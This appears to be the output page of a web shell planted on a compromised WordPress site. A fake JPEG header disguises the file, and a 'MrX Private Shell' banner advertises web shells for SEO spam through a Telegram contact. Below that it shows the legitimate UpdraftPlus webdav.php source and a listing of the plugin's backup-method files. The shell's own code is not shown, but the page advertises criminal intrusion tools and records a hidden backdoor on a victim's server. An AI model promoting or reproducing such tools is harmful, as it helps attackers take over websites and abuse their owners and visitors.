����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if (!defined('UPDRAFTPLUS_DIR')) die('No direct access allowed.');
if (class_exists('UpdraftPlus_Addons_RemoteStorage_webdav')) {
// Migrate options to new-style storage - April 2017
if (!is_array(UpdraftPlus_Options::get_updraft_option('updraft_webdav')) && '' != UpdraftPlus_Options::get_updraft_option('updraft_webdav_settings', '')) {
$opts = UpdraftPlus_Options::get_updraft_option('updraft_webdav_settings');
UpdraftPlus_Options::update_updraft_option('updraft_webdav', $opts);
UpdraftPlus_Options::delete_updraft_option('updraft_webdav_settings');
}
class UpdraftPlus_BackupModule_webdav extends UpdraftPlus_Addons_RemoteStorage_webdav {
public function __construct() {
parent::__construct('webdav', 'WebDAV');
}
}
} else {
updraft_try_include_file('methods/addon-not-yet-present.php', 'include_once');
/**
* N.B. UpdraftPlus_BackupModule_AddonNotYetPresent extends UpdraftPlus_BackupModule
*/
class UpdraftPlus_BackupModule_webdav extends UpdraftPlus_BackupModule_AddonNotYetPresent {
public function __construct() {
parent::__construct('webdav', 'WebDAV');
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| addon-base-v2.php | File | 12.02 KB | 0644 |
|
| addon-not-yet-present.php | File | 6.05 KB | 0644 |
|
| azure.php | File | 1.15 KB | 0644 |
|
| backup-module.php | File | 31.03 KB | 0644 |
|
| dreamobjects.php | File | 10.95 KB | 0644 |
|
| dropbox.php | File | 44.27 KB | 0644 |
|
| email.php | File | 5.79 KB | 0644 |
|
| ftp.php | File | 18.74 KB | 0644 |
|
| googledrive.php | File | 67.23 KB | 0644 |
|
| insufficient.php | File | 4.93 KB | 0644 |
|
| s3generic.php | File | 14.96 KB | 0644 |
|
| template.php | File | 5.16 KB | 0644 |
|
| updraftvault.php | File | 49.86 KB | 0644 |
|
| webdav.php | File | 1.1 KB | 0644 |
|